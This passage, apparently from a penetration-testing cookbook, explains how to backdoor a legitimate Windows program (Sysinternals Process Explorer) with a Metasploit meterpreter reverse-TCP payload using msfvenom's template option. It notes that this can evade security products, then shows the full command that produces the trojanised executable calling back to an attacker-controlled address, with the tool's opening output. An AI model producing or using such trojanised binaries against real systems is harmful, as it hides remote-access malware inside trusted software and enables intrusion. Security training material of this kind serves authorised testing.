Templates
Backdooring known applications can be a good way to compromise a target, for example, when you are already on the internal network and get access to the internal software repository. Also, by using a custom template, you may be able to bypass some security solutions that are using the default template to detect Metasploit payloads.
Getting ready
MSFvenom, by default, uses the templates in the /usr/share/metasploit-framework/data/templates directory, but we can choose to use our own, using the -x option.
How to do it...
- Using the -x option, we can specify our own template; in this recipe we will use Process Explorer from Windows Sysinternals, and, by using the -k option, we can run the payload as a new thread from the template:
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.216.5 -x procexp.exe -k -f exe -o procexp-backdoored.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload...